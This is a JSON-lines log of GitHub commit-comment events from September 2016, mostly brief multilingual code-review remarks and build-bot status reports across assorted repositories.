{"id":"4627949508","type":"CommitCommentEvent","actor":{"login":"pcmoore"},"repo":{"name":"rgbriggs/audit-testsuite"},"payload":{"comment":{"id":19200738,"position":121,"line":121,"path":"tests/filter_exclude/test","commit_id":"d79efe31c69ce82183a357a587fdcd73e3253f9b","created_at":"2016-09-28T01:22:37Z","updated_at":"2016-09-28T01:22:37Z","body":"Sorry, brain-o on my part."}},"created_at":"2016-09-28T01:22:37Z"}
{"id":"4627953949","type":"CommitCommentEvent","actor":{"login":"dgadelha"},"repo":{"name":"zf5/android_device_asus_ctp-common"},"payload":{"comment":{"id":19200749,"position":null,"line":null,"path":null,"commit_id":"dfcd0d51b402887d7648a5cdbe45d105397e51a2","created_at":"2016-09-28T01:24:10Z","updated_at":"2016-09-28T01:24:10Z","body":"A good idea is to disable everything related to Camera, just to let you know.\r\nThe important is to boot, not to boot with all features."}},"created_at":"2016-09-28T01:24:10Z"}
{"id":"4627954739","type":"CommitCommentEvent","actor":{"login":"gklundt"},"repo":{"name":"ParaSwarm/House-Lannister"},"payload":{"comment":{"id":19200752,"position":48,"line":48,"path":"app/src/main/java/edu/uco/houselannister/saveasingle/fragments/SearchCriteriaFragment.java","commit_id":"f469abb9d9960d6e88c6f52f62c68101377de2c4","created_at":"2016-09-28T01:24:28Z","updated_at":"2016-09-28T01:24:28Z","body":"I fear the reg lion spinner"}},"created_at":"2016-09-28T01:24:28Z"}
{"id":"4627955387","type":"CommitCommentEvent","actor":{"login":"mercury233"},"repo":{"name":"Fluorohydride/ygopro-pre-script"},"payload":{"comment":{"id":19200755,"position":null,"line":null,"path":null,"commit_id":"6b531690b65f69b7f194df55c8d3ab7cb60830e4","created_at":"2016-09-28T01:24:42Z","updated_at":"2016-09-28T01:24:42Z","body":"if the change name effect appears in future, we can change aux.AddXyzProcedure instead."}},"created_at":"2016-09-28T01:24:42Z"}
{"id":"4627959354","type":"CommitCommentEvent","actor":{"login":"eilenflores"},"repo":{"name":"eilenflores/eilenflow"},"payload":{"comment":{"id":19200764,"position":null,"line":null,"path":null,"commit_id":"f0c3f960c03952fafe8db9ca28a3b6720c5e54e6","created_at":"2016-09-28T01:26:07Z","updated_at":"2016-09-28T01:26:07Z","body":"<!-- Left aligned menu below button -->\r\n<button id=\"demo-menu-lower-left\"\r\n        class=\"mdl-button mdl-js-button mdl-button--icon\">\r\n  <i class=\"material-icons\">more_vert</i>\r\n</button>\r\n\r\n<ul class=\"mdl-menu mdl-menu--bottom-left mdl-js-menu mdl-js-ripple-effect\"\r\n    for=\"demo-menu-lower-left\">\r\n  <li class=\"mdl-menu__item\">Some Action</li>\r\n  <li class=\"mdl-menu__item mdl-menu__item--full-bleed-divider\">Another Action</li>\r\n  <li disabled class=\"mdl-menu__item\">Disabled Action</li>\r\n  <li class=\"mdl-menu__item\">Yet Another Action</li>\r\n</ul>\r\n"}},"created_at":"2016-09-28T01:26:07Z"}
{"id":"4627959610","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19200765,"position":null,"line":null,"path":null,"commit_id":"8a6c19b968c4e61b4b79e59bdb4f8c5745502c1a","created_at":"2016-09-28T01:26:13Z","updated_at":"2016-09-28T01:26:13Z","body":"ENERGYPLUS_EXPECTED_HASH (evanweaver) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-8a6c19b968c4e61b4b79e59bdb4f8c5745502c1a-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-28T01:26:13Z"}
{"id":"4627963877","type":"CommitCommentEvent","actor":{"login":"DiglidiDudeNG"},"repo":{"name":"popcorncolonel/Chrome-Extensions"},"payload":{"comment":{"id":19200769,"position":75,"line":348,"path":"Kappa Everywhere/contentscript.js","commit_id":"365f938289577306cad9754867d44c9f27e7866c","created_at":"2016-09-28T01:27:48Z","updated_at":"2016-09-28T01:27:48Z","body":"Well the code base seemed alright, I was more disturbed by the lack of `var` statements and some logic statements were easy to simplify but that was from looking at it for about 30 minutes."}},"created_at":"2016-09-28T01:27:48Z"}
{"id":"4627965265","type":"CommitCommentEvent","actor":{"login":"indieforger"},"repo":{"name":"sahat/satellizer"},"payload":{"comment":{"id":19200771,"position":null,"line":null,"path":null,"commit_id":"10e663477c5b8c20a9571926076312ce43a9196c","created_at":"2016-09-28T01:28:19Z","updated_at":"2016-09-28T01:28:19Z","body":"Good catch!"}},"created_at":"2016-09-28T01:28:19Z"}
{"id":"4627970361","type":"CommitCommentEvent","actor":{"login":"pcmoore"},"repo":{"name":"rgbriggs/audit-testsuite"},"payload":{"comment":{"id":19200784,"position":87,"line":87,"path":"tests/filter_sessionid/test","commit_id":"2584bcc842da7511dbac3482f2eaf2afc6f2db39","created_at":"2016-09-28T01:30:09Z","updated_at":"2016-09-28T01:30:09Z","body":"My take on this particular test is that you are attempting to verify the 'sessionid_set' filter (see line #54), is that not correct?  If you are testing for that case, matching 'ses' to '$sessionid' isn't important, although you could do a match to make sure it was set and not the kernel's unset value (I believe it is (int)-1, but my memory could be wrong here)."}},"created_at":"2016-09-28T01:30:09Z"}
{"id":"4627970752","type":"CommitCommentEvent","actor":{"login":"hussein-al-Arab"},"repo":{"name":"hussein-al-Arab/SMB215-circulation-avec-raspberry-pi"},"payload":{"comment":{"id":19200786,"position":null,"line":null,"path":null,"commit_id":"624269eb587e443858a11264b20e9c9aed2ab204","created_at":"2016-09-28T01:30:15Z","updated_at":"2016-09-28T01:30:15Z","body":"Tout amateur ici qui sait ce que ces connecteurs-fils sont appelés? Je vais devoir acheter à mon entreprise d'électronique."}},"created_at":"2016-09-28T01:30:15Z"}
{"id":"4627972271","type":"CommitCommentEvent","actor":{"login":"KevinHeaton-Money4nothin"},"repo":{"name":"jekyll/jekyll"},"payload":{"comment":{"id":19200790,"position":null,"line":null,"path":null,"commit_id":"99fc60e28c192cb44fe372efbf5ffed8148ad8cb","created_at":"2016-09-28T01:30:47Z","updated_at":"2016-09-28T01:30:47Z","body":"@ivey "}},"created_at":"2016-09-28T01:30:47Z"}
{"id":"4627973554","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200795,"position":5,"line":14,"path":"app/views/users/show.html.erb","commit_id":"a0d168d1cb40310217566dce13730d59066aef50","created_at":"2016-09-28T01:31:14Z","updated_at":"2016-09-28T01:31:14Z","body":"パーシャル化、良いですね。"}},"created_at":"2016-09-28T01:31:14Z"}
{"id":"4627974312","type":"CommitCommentEvent","actor":{"login":"weifenxiangerlai"},"repo":{"name":"weifenxiangerlai/PMLGitHup"},"payload":{"comment":{"id":19200798,"position":null,"line":null,"path":null,"commit_id":"b2e22c6550e27e720bb82645a7a67aba152834dd","created_at":"2016-09-28T01:31:31Z","updated_at":"2016-09-28T01:31:31Z","body":"\r\n\r\n[Weibo.zip](https://github.com/weifenxiangerlai/PMLGitHup/files/496951/Weibo.zip)\r\n"}},"created_at":"2016-09-28T01:31:31Z"}
{"id":"4627974669","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200800,"position":null,"line":null,"path":null,"commit_id":"6f3e6663c75ac25cff6750e089bd4c051f6894f5","created_at":"2016-09-28T01:31:38Z","updated_at":"2016-09-28T01:31:38Z","body":"プリコンパイルのみでコミットをするのは、細かすぎます。w"}},"created_at":"2016-09-28T01:31:38Z"}
{"id":"4627975340","type":"CommitCommentEvent","actor":{"login":"jdurgin"},"repo":{"name":"ryneli/ceph"},"payload":{"comment":{"id":19200803,"position":5,"line":5473,"path":"src/osd/ReplicatedPG.cc","commit_id":"0249f92150a1152019ffc9ecd1e3f64028b7f742","created_at":"2016-09-28T01:31:55Z","updated_at":"2016-09-28T01:31:55Z","body":"op here is a ceph_osd_op - Op is only used in the Objecter. naming is not our strong suit - there's even op.op.op some places :) "}},"created_at":"2016-09-28T01:31:55Z"}
{"id":"4627975991","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200805,"position":38,"line":56,"path":"app/views/layouts/application.html.erb","commit_id":"f38293bd733d76fa5b24605ccbea8f3da53b94d7","created_at":"2016-09-28T01:32:10Z","updated_at":"2016-09-28T01:32:10Z","body":"正式社名は、株式会社Dive into Codeです。w"}},"created_at":"2016-09-28T01:32:10Z"}
{"id":"4627976831","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19200808,"position":null,"line":null,"path":null,"commit_id":"e5ab0940f7fc1ced4c80848c91ee0b356ce8afee","created_at":"2016-09-28T01:32:27Z","updated_at":"2016-09-28T01:32:27Z","body":"license-update (macumber) - x86_64-MacOS-10.10-clang: OK (2388 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e5ab0940f7fc1ced4c80848c91ee0b356ce8afee-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-e5ab0940f7fc1ced4c80848c91ee0b356ce8afee-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.55%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T01:32:27Z"}
{"id":"4627980589","type":"CommitCommentEvent","actor":{"login":"weifenxiangerlai"},"repo":{"name":"weifenxiangerlai/PMLGitHup"},"payload":{"comment":{"id":19200812,"position":null,"line":null,"path":null,"commit_id":"b2e22c6550e27e720bb82645a7a67aba152834dd","created_at":"2016-09-28T01:33:49Z","updated_at":"2016-09-28T01:33:49Z","body":"模仿新浪微博，目前未实现的功能，首页表情文字未转化为表情，转化为表情后，链接点击会出问题，有的链接点击没反应，位置判断不准确，哪位大神可以帮我看一下怎么修改"}},"created_at":"2016-09-28T01:33:49Z"}
{"id":"4627983763","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19200823,"position":14,"line":14,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembasTest.java","commit_id":"4c61deb596cc30285c9a719d2381d5eafecbfda2","created_at":"2016-09-28T01:34:56Z","updated_at":"2016-09-28T01:34:56Z","body":"Pode fazer direto\r\n\r\n```\r\nassertTrue(ret);\r\n```"}},"created_at":"2016-09-28T01:34:56Z"}
{"id":"4627985022","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19200826,"position":25,"line":25,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembasTest.java","commit_id":"4c61deb596cc30285c9a719d2381d5eafecbfda2","created_at":"2016-09-28T01:35:23Z","updated_at":"2016-09-28T01:35:23Z","body":"Pode fazer direto\r\n\r\n```Java\r\nassertFalse(ret);\r\n```"}},"created_at":"2016-09-28T01:35:23Z"}
{"id":"4627989717","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19200832,"position":6,"line":18,"path":"src/modulo-01-java-OO/modulo-01/Dwarves.java","commit_id":"4c61deb596cc30285c9a719d2381d5eafecbfda2","created_at":"2016-09-28T01:37:03Z","updated_at":"2016-09-28T01:37:03Z","body":"O cliente não pediu isto."}},"created_at":"2016-09-28T01:37:03Z"}
{"id":"4627990599","type":"CommitCommentEvent","actor":{"login":"TonyMaster21"},"repo":{"name":"TonyMaster21/skUnity"},"payload":{"comment":{"id":19200836,"position":null,"line":null,"path":null,"commit_id":"306b9466d309ecf941cd6dafe814dbe943549265","created_at":"2016-09-28T01:37:21Z","updated_at":"2016-09-28T01:37:21Z","body":"Nice token! **Generated a new token.**"}},"created_at":"2016-09-28T01:37:21Z"}
{"id":"4627996127","type":"CommitCommentEvent","actor":{"login":"coorg"},"repo":{"name":"ekeeke/Genesis-Plus-GX"},"payload":{"comment":{"id":19200847,"position":null,"line":null,"path":null,"commit_id":"8b909e40350ffe7a85176912c60f869221f57510","created_at":"2016-09-28T01:39:23Z","updated_at":"2016-09-28T01:39:23Z","body":"Monroe can you zip up your install and attach it or send it over? I'm thinking it's a config issue that just HAPPENS to accompany a bug that I found at random."}},"created_at":"2016-09-28T01:39:23Z"}
{"id":"4627996787","type":"CommitCommentEvent","actor":{"login":"Sharavanth"},"repo":{"name":"jasminejanet/react-table"},"payload":{"comment":{"id":19200849,"position":32,"line":57,"path":"public/scripts/Table.js","commit_id":"7eda351761a5e2087974cc58b1b94754fd52d86c","created_at":"2016-09-28T01:39:36Z","updated_at":"2016-09-28T01:39:36Z","body":"Don't leave such blank lines"}},"created_at":"2016-09-28T01:39:36Z"}
{"id":"4628003258","type":"CommitCommentEvent","actor":{"login":"lingsoul"},"repo":{"name":"lingsoul/hello-world"},"payload":{"comment":{"id":19200867,"position":null,"line":null,"path":null,"commit_id":"fc8febd1fa1ba2ffe63e7105abcaad19f0ed07de","created_at":"2016-09-28T01:41:50Z","updated_at":"2016-09-28T01:41:50Z","body":"hello  剑冰啊啊啊啊"}},"created_at":"2016-09-28T01:41:50Z"}
{"id":"4628004575","type":"CommitCommentEvent","actor":{"login":"benladen"},"repo":{"name":"xingxueke/skPakTool"},"payload":{"comment":{"id":19200870,"position":null,"line":null,"path":null,"commit_id":"6d4b822f8b2494d342d66c6d4ac8c1de43d618fc","created_at":"2016-09-28T01:42:17Z","updated_at":"2016-09-28T01:42:17Z","body":"感谢回复，能否帮我编译一个呢，编程不是太懂。"}},"created_at":"2016-09-28T01:42:17Z"}
{"id":"4628004792","type":"CommitCommentEvent","actor":{"login":"renayo"},"repo":{"name":"renayo/KeplerQuiz"},"payload":{"comment":{"id":19200871,"position":null,"line":null,"path":null,"commit_id":"05d838c82f4247f8637547a3f3debb62f79603cc","created_at":"2016-09-28T01:42:22Z","updated_at":"2016-09-28T01:42:22Z","body":"Documentation"}},"created_at":"2016-09-28T01:42:22Z"}
{"id":"4628005465","type":"CommitCommentEvent","actor":{"login":"smadha"},"repo":{"name":"USCDataScience/sparkler"},"payload":{"comment":{"id":19200873,"position":null,"line":null,"path":null,"commit_id":"d77618cba2599b7608db003f466bbaa0273be17a","created_at":"2016-09-28T01:42:36Z","updated_at":"2016-09-28T01:42:36Z","body":"Do we still need active-plugin module?"}},"created_at":"2016-09-28T01:42:36Z"}
{"id":"4628005528","type":"CommitCommentEvent","actor":{"login":"Samangan"},"repo":{"name":"Samangan/owLint"},"payload":{"comment":{"id":19200874,"position":18,"line":24,"path":"src/main/scala/main.scala","commit_id":"6ff8757e872463aa36eb1120ecebcdc8137d6057","created_at":"2016-09-28T01:42:38Z","updated_at":"2016-09-28T01:42:38Z","body":"Why is this main()?"}},"created_at":"2016-09-28T01:42:38Z"}
{"id":"4628006740","type":"CommitCommentEvent","actor":{"login":"jwalters006"},"repo":{"name":"jwalters006/recipes"},"payload":{"comment":{"id":19200878,"position":null,"line":null,"path":null,"commit_id":"ae49a1f0d2a69f73de8face482a5e146f6c503e9","created_at":"2016-09-28T01:43:03Z","updated_at":"2016-09-28T01:43:03Z","body":"I should have used the imperative form of \"Add\", instead of \"Added\"!"}},"created_at":"2016-09-28T01:43:03Z"}
{"id":"4628007325","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19200879,"position":5,"line":11,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembas.java","commit_id":"4c61deb596cc30285c9a719d2381d5eafecbfda2","created_at":"2016-09-28T01:43:15Z","updated_at":"2016-09-28T01:43:15Z","body":"pode simplificar e retornar direto:\r\n\r\n```Java\r\nreturn div > 1 && div <= 100 && div % 2 == 0;\r\n```"}},"created_at":"2016-09-28T01:43:15Z"}
{"id":"4628008414","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"gabrielRosa/crescer-2016-2"},"payload":{"comment":{"id":19200882,"position":5,"line":11,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembas.java","commit_id":"4c61deb596cc30285c9a719d2381d5eafecbfda2","created_at":"2016-09-28T01:43:37Z","updated_at":"2016-09-28T01:43:37Z","body":"Cuidado que o exercício se refere ao número de pães estar entre 1 e 100, e não a divisão."}},"created_at":"2016-09-28T01:43:37Z"}
{"id":"4628013930","type":"CommitCommentEvent","actor":{"login":"prehonker"},"repo":{"name":"prehonker/hello-world"},"payload":{"comment":{"id":19200892,"position":null,"line":null,"path":null,"commit_id":"254e64fcef814cf0b2b711fd72053af12307ea81","created_at":"2016-09-28T01:45:27Z","updated_at":"2016-09-28T01:45:27Z","body":"av"}},"created_at":"2016-09-28T01:45:27Z"}
{"id":"4628013996","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200893,"position":4,"line":4,"path":"app/controllers/comments_controller.rb","commit_id":"84a48c41fc164ff2aa02f6058dd873c87b434945","created_at":"2016-09-28T01:45:28Z","updated_at":"2016-09-28T01:45:28Z","body":"コーディング規約に則り、def内にコメントは書かないようにしましょう。"}},"created_at":"2016-09-28T01:45:28Z"}
{"id":"4628014249","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200894,"position":8,"line":8,"path":"app/controllers/comments_controller.rb","commit_id":"84a48c41fc164ff2aa02f6058dd873c87b434945","created_at":"2016-09-28T01:45:33Z","updated_at":"2016-09-28T01:45:33Z","body":"ここも。"}},"created_at":"2016-09-28T01:45:33Z"}
{"id":"4628014297","type":"CommitCommentEvent","actor":{"login":"prehonker"},"repo":{"name":"prehonker/hello-world"},"payload":{"comment":{"id":19200895,"position":null,"line":null,"path":null,"commit_id":"254e64fcef814cf0b2b711fd72053af12307ea81","created_at":"2016-09-28T01:45:35Z","updated_at":"2016-09-28T01:45:35Z","body":"cd"}},"created_at":"2016-09-28T01:45:35Z"}
{"id":"4628015542","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200899,"position":8,"line":11,"path":"app/views/blogs/index.html.erb","commit_id":"84a48c41fc164ff2aa02f6058dd873c87b434945","created_at":"2016-09-28T01:45:58Z","updated_at":"2016-09-28T01:45:58Z","body":"インデントがおかしいです。"}},"created_at":"2016-09-28T01:45:58Z"}
{"id":"4628016499","type":"CommitCommentEvent","actor":{"login":"minxomat"},"repo":{"name":"turbo/alwsl"},"payload":{"comment":{"id":19200902,"position":null,"line":null,"path":null,"commit_id":"7139e1186bb8cf463060fed0ca0b4e268d4a13cb","created_at":"2016-09-28T01:46:16Z","updated_at":"2016-09-28T01:46:16Z","body":"Thanks mate."}},"created_at":"2016-09-28T01:46:16Z"}
{"id":"4628017405","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200905,"position":4,"line":70,"path":"Gemfile","commit_id":"efab3d8cb79331bfee457906231ee07b517d2bae","created_at":"2016-09-28T01:46:35Z","updated_at":"2016-09-28T01:46:35Z","body":"このコメントも。"}},"created_at":"2016-09-28T01:46:35Z"}
{"id":"4628019688","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200913,"position":27,"line":27,"path":"app/uploaders/avatar_uploader.rb","commit_id":"efab3d8cb79331bfee457906231ee07b517d2bae","created_at":"2016-09-28T01:47:23Z","updated_at":"2016-09-28T01:47:23Z","body":"最初からあるコメント行は消してしまってください。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-28T01:47:23Z"}
{"id":"4628021669","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200919,"position":11,"line":18,"path":"app/controllers/application_controller.rb","commit_id":"efab3d8cb79331bfee457906231ee07b517d2bae","created_at":"2016-09-28T01:48:05Z","updated_at":"2016-09-28T01:48:05Z","body":"ロケットハッシュは、使わないようにしましょう。\r\nRuby1.8以前の書き方です。動きますが、実務現場では嫌われます。"}},"created_at":"2016-09-28T01:48:05Z"}
{"id":"4628024125","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mateusbpt/crescer-2016-2"},"payload":{"comment":{"id":19200927,"position":8,"line":30,"path":"src/modulo-01-java-OO/modulo-01/ElfoTest.java","commit_id":"1704490b8be3a0e85aa7f9fa1ceab88a2008de54","created_at":"2016-09-28T01:48:57Z","updated_at":"2016-09-28T01:48:57Z","body":"Cuidar indentação do código para ficar mais fácil de entender."}},"created_at":"2016-09-28T01:48:57Z"}
{"id":"4628025502","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mateusbpt/crescer-2016-2"},"payload":{"comment":{"id":19200933,"position":17,"line":39,"path":"src/modulo-01-java-OO/modulo-01/ElfoTest.java","commit_id":"1f390a888719f12cedb6b4bbc4118f69b8334e7e","created_at":"2016-09-28T01:49:25Z","updated_at":"2016-09-28T01:49:25Z","body":"Cuidar indentação do código para ficar mais legível."}},"created_at":"2016-09-28T01:49:25Z"}
{"id":"4628025869","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200934,"position":null,"line":null,"path":null,"commit_id":"71b9421eca5fac483a7ac4c09d37808c85f50a22","created_at":"2016-09-28T01:49:32Z","updated_at":"2016-09-28T01:49:32Z","body":"これは、何のコミットですか？w"}},"created_at":"2016-09-28T01:49:32Z"}
{"id":"4628026146","type":"CommitCommentEvent","actor":{"login":"Step7750"},"repo":{"name":"Step7750/ScheduleStorm_Server"},"payload":{"comment":{"id":19200935,"position":45,"line":208,"path":"uni/UAlberta.py","commit_id":"79fadf2a1de6d95eadbc083cb8149fabf3987d9c","created_at":"2016-09-28T01:49:38Z","updated_at":"2016-09-28T01:49:38Z","body":"Could we make some room in the DB for a lookup of UID to Fullname rather than sending 100's of requests every time the course list of updated?"}},"created_at":"2016-09-28T01:49:38Z"}
{"id":"4628026177","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"mateusbpt/crescer-2016-2"},"payload":{"comment":{"id":19200936,"position":23,"line":45,"path":"src/modulo-01-java-OO/modulo-01/ElfoTest.java","commit_id":"1f390a888719f12cedb6b4bbc4118f69b8334e7e","created_at":"2016-09-28T01:49:39Z","updated_at":"2016-09-28T01:49:39Z","body":"O nome deste método está ruim. Ele não diz o que o cenário de testes faz."}},"created_at":"2016-09-28T01:49:39Z"}
{"id":"4628027466","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200938,"position":10,"line":10,"path":"app/mailers/notice_mailer.rb","commit_id":"b7b3889adf568dc34f342d867f2eb24cd7c51158","created_at":"2016-09-28T01:50:04Z","updated_at":"2016-09-28T01:50:04Z","body":"こういう不要な空行はNGです。\r\nhttps://shugo.net/ruby-codeconv/codeconv.html"}},"created_at":"2016-09-28T01:50:04Z"}
{"id":"4628027542","type":"CommitCommentEvent","actor":{"login":"Sindrone"},"repo":{"name":"d-ronin/dRonin"},"payload":{"comment":{"id":19200939,"position":null,"line":null,"path":null,"commit_id":"74b7422cb1e0fd7c7bab3a7319f2f900de07ba8c","created_at":"2016-09-28T01:50:05Z","updated_at":"2016-09-28T01:50:05Z","body":"How does the new tune feel?"}},"created_at":"2016-09-28T01:50:05Z"}
{"id":"4628028911","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200946,"position":5,"line":15,"path":"config/initializers/devise.rb","commit_id":"b7b3889adf568dc34f342d867f2eb24cd7c51158","created_at":"2016-09-28T01:50:35Z","updated_at":"2016-09-28T01:50:35Z","body":"サンプルのメールアドレスは、専用のドメインを使ってください。\r\nhttp://allabout.co.jp/gm/gc/23887/"}},"created_at":"2016-09-28T01:50:35Z"}
{"id":"4628030816","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200950,"position":7,"line":11,"path":"db/seeds.rb","commit_id":"a8cd3a5220134fdb83f8f04c6e72ae561b1dce34","created_at":"2016-09-28T01:51:16Z","updated_at":"2016-09-28T01:51:16Z","body":"不要なコメント行は削除しましょう。"}},"created_at":"2016-09-28T01:51:16Z"}
{"id":"4628031357","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200952,"position":null,"line":null,"path":null,"commit_id":"5befa095ab96c9ad1a607f4e2a6dcfc5a6dd3d47","created_at":"2016-09-28T01:51:29Z","updated_at":"2016-09-28T01:51:29Z","body":"これは、一体何のコミットですか？"}},"created_at":"2016-09-28T01:51:29Z"}
{"id":"4628031374","type":"CommitCommentEvent","actor":{"login":"MrXinin"},"repo":{"name":"MrXinin/test"},"payload":{"comment":{"id":19200953,"position":null,"line":null,"path":null,"commit_id":"bc0bdb797d7473c961819ac892b4d624f129ef6b","created_at":"2016-09-28T01:51:29Z","updated_at":"2016-09-28T01:51:29Z","body":"dsdsd"}},"created_at":"2016-09-28T01:51:29Z"}
{"id":"4628031464","type":"CommitCommentEvent","actor":{"login":"claudioandre"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":19200955,"position":null,"line":null,"path":null,"commit_id":"7b47e453b4207fd758a2e2d2f5c642c15a8f32a6","created_at":"2016-09-28T01:51:32Z","updated_at":"2016-09-28T01:51:32Z","body":"BTW: the problem you were facing were not caused by Ubuntu x Fedora. It was caused by Fred Flintstone's preferences. Now:\r\n\r\nClaudio André authored and committed\r\n 4 minutes ago\r\n```\r\nchecking if gcc supports -Og... yes\r\nchecking if gcc supports -fsanitize=address... yes\r\n```\r\n\r\n```\r\nchecking if clang supports -Og... no\r\nchecking if clang supports -fsanitize=address... yes\r\n```\r\n*****\r\n\r\nI will do some tests to see what I get on errors. I might not ask for a merge soon."}},"created_at":"2016-09-28T01:51:32Z"}
{"id":"4628031859","type":"CommitCommentEvent","actor":{"login":"dredenba"},"repo":{"name":"ZipArchive/ZipArchive"},"payload":{"comment":{"id":19200956,"position":null,"line":null,"path":null,"commit_id":"d1e5f47e29da8fd661237718316d40519c9f9a00","created_at":"2016-09-28T01:51:40Z","updated_at":"2016-09-28T01:51:40Z","body":"I think this is a bug or needs further coding to cover one of the created error cases.\r\nI made Issue #289 to call out specifically what I found and write a test to prove the breakage"}},"created_at":"2016-09-28T01:51:40Z"}
{"id":"4628033050","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200958,"position":1,"line":1,"path":"config/initializers/devise.rb","commit_id":"bd17330a2acdae774f0bac7e664d9ff83769f3cf","created_at":"2016-09-28T01:52:05Z","updated_at":"2016-09-28T01:52:05Z","body":"不要なコメント行は削除しておきましょう。"}},"created_at":"2016-09-28T01:52:05Z"}
{"id":"4628033926","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"cassiofariasmachado/crescer-2016-2"},"payload":{"comment":{"id":19200963,"position":26,"line":48,"path":"src/modulo-01-java-OO/modulo-01/ElfoTest.java","commit_id":"1e110d9de2e85634a005b7c92a03e626603c52f4","created_at":"2016-09-28T01:52:23Z","updated_at":"2016-09-28T01:52:23Z","body":"Opa, este cenário não está legal. O teste precisa ser determinístico, exato. Não podemos depender de algoritmos semi-randômicos. Deixa o número de flechas a serem tiradas fixo, não existe problema com isso para testes."}},"created_at":"2016-09-28T01:52:23Z"}
{"id":"4628034020","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200964,"position":39,"line":39,"path":"db/migrate/20160921083722_devise_create_users.rb","commit_id":"bd17330a2acdae774f0bac7e664d9ff83769f3cf","created_at":"2016-09-28T01:52:25Z","updated_at":"2016-09-28T01:52:25Z","body":"この辺も不要であれば削除しておきましょう。"}},"created_at":"2016-09-28T01:52:25Z"}
{"id":"4628036343","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200967,"position":9,"line":279,"path":"config/initializers/devise.rb","commit_id":"efab3d8cb79331bfee457906231ee07b517d2bae","created_at":"2016-09-28T01:53:12Z","updated_at":"2016-09-28T01:53:12Z","body":"コミットログに重要な情報が残ってしまっています。\r\n全世界に公開されていますよ！"}},"created_at":"2016-09-28T01:53:12Z"}
{"id":"4628036815","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200968,"position":4,"line":276,"path":"config/initializers/devise.rb","commit_id":"efab3d8cb79331bfee457906231ee07b517d2bae","created_at":"2016-09-28T01:53:22Z","updated_at":"2016-09-28T01:53:22Z","body":"こちらも全世界に公開されています！"}},"created_at":"2016-09-28T01:53:22Z"}
{"id":"4628038225","type":"CommitCommentEvent","actor":{"login":"norotime"},"repo":{"name":"syugoing/achieve"},"payload":{"comment":{"id":19200970,"position":28,"line":28,"path":"app/models/user.rb","commit_id":"de599df84c1b21bf8f9e244628459c9cf8642e89","created_at":"2016-09-28T01:53:52Z","updated_at":"2016-09-28T01:53:52Z","body":"不要な空行は削除。"}},"created_at":"2016-09-28T01:53:52Z"}
